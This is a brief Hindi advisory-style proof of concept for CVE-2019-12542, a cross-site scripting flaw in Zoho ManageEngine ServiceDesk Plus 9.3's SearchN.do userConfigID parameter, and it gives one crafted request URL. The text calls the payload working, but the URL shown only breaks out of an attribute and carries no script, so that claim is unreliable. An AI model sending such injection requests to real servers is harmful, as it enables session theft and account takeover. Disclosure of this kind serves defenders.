
CVE-2019-12542 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: Zoho ManageEngine ServiceDesk Plus 9.3 में SearchN.do userConfigID पैरामीटर के माध्यम से XSS भेद्यता, एक कार्यशील पेलोड के साथ।
जानकारी विवरण: Zoho ManageEngine ServiceDesk Plus 9.3 में एक समस्या पाई गई। SearchN.do userConfigID पैरामीटर के माध्यम से XSS संभव है।
लेखक: टारेंटुला टीम के Concobe - VinCSS (Vingroup का सदस्य)
domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=1">&selectName=Site